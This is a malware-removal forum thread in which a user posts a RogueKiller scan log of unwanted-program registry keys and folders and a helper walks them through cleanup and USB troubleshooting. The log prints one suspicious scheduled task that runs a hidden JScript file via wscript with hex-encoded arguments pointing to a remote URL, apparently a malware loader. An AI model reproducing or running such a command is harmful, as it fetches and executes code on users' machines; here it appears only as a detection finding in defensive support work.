« Reply #4 on: April 13, 2017, 07:22:02 PM »
RogueKiller V12.10.4.0 (x64) [Apr 10 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.14393) 64 bits version
Started in : Normal mode
User : ghy [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 04/13/2017 20:26:10 (Duration : 00:41:52)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 17 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484} (C:\Program Files\Reimage\Reimage Repair\REI_Axcontrol.dll) -> Found
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB} (C:\Program Files\Reimage\Reimage Repair\REI_Axcontrol.dll) -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Reimage -> Found
[PUP.DownloadAssistant] (X86) HKEY_LOCAL_MACHINE\Software\DVDVideoSoft -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\csastats -> Found
[PUP.DownloadAssistant] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\DVDVideoSoft -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\OCS -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\ProductSetup -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Reimage -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\csastats -> Found
[PUP.DownloadAssistant] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\DVDVideoSoft -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\OCS -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\ProductSetup -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Reimage -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Update service (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {00B8A13D-CCCB-469C-9A49-F0CEF71BF6BC} : v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| [-] -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {811A54C6-DF42-4378-872C-EFB4F8516A9C} : v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| [-] -> Found

¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path|VT.Unknown] %WINDIR%\Tasks\Yahoo! Powered tadid.job -- C:\WINDOWS\system32\wscript.exe ("C:\ProgramData\{96FE539D-1CBC-D95B-9A7A-47190038CCD7}\fata.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b39364645353339442d314342432d443935422d394137412d3437313930303338434344377d5c736563696469" "433a5c50726f6772616d446174615c7b39364645353339442d314342432d443935422d394137412d3437313930303338434344377d5c736972616c6f6c" "//B" "//E:jscript" "--IsErIk" ) -> Found

¤¤¤ Files : 2 ¤¤¤
[PUP.FusionCore|PUP.Gen0][Folder] C:\Program Files (x86)\Common Files\DVDVideoSoft -> Found
[PUP.Gen1][Folder] C:\Program Files (x86)\Popcorn Time -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD3200BPVT-22JJ5T0 +++++
--- User ---
[MBR] 2b8c13c9fe7aa3fa87c1c94de6490a67
[BSP] f08be744cb9cd69f4160f0e70fe4ba66 : Empty|VT.Unknown MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 400 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 821248 | Size: 300 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 288115 MB
4 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 593496064 | Size: 15452 MB
User = LL1 ... OK
User = LL2 ... OK


Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #5 on: April 13, 2017, 07:42:39 PM »
Go ahead and run AdwCleaner and RogueKiller again. Make sure to select all the entries it finds, and then in AdwCleaner hit the clean button. In Roguekiller click on the remove selected button. Reboot your computer and tell me if anything else has changed.

When was the last time you updated malwarebytes and ran a scan?

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #6 on: April 13, 2017, 07:54:59 PM »
yesterday but i can run it again tommorow. i'm headed to bed shortly

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #7 on: April 14, 2017, 06:19:19 AM »
ran the malwarebytes scan. only 2 items show up so cleaned up. i still can't use my usb port to connect my external drive to get my stuff off computer. anymore suggestions before i cry?

Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #8 on: April 14, 2017, 09:33:41 AM »
We are just getting started. Before we move to hardware, how is the computer running?

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #9 on: April 14, 2017, 09:52:19 AM »
 Seems to be running good

Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #10 on: April 14, 2017, 10:26:19 AM »
Go to the control panel and then to the Device manager and look at your hardware list. Tell me if there are any devices with a yellow exclamation mark or a red x. If there is, tell me what device has that mark next to it.

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #11 on: April 15, 2017, 02:38:40 PM »
 Nothing shows up with exclamation point or error. Was able to start burning files to cd-r again

Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #12 on: April 15, 2017, 06:55:22 PM »
How about your USB port? Is that the only USB port that you have?

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!

Offline mommyto3furballs

  • Bronze Member
  • Posts: 190
Re: [In Progress] Problems with computer
« Reply #13 on: April 16, 2017, 05:32:35 AM »
There are 3 USB ports in the computer. 2 on one side aND 1 on the other side. None seem to work. Beginning to wonder if the external hard drive died :(

Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #14 on: April 16, 2017, 08:14:24 AM »
Do you have a USB device you can plug into the computer, or another computer you can plug the drive into.

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!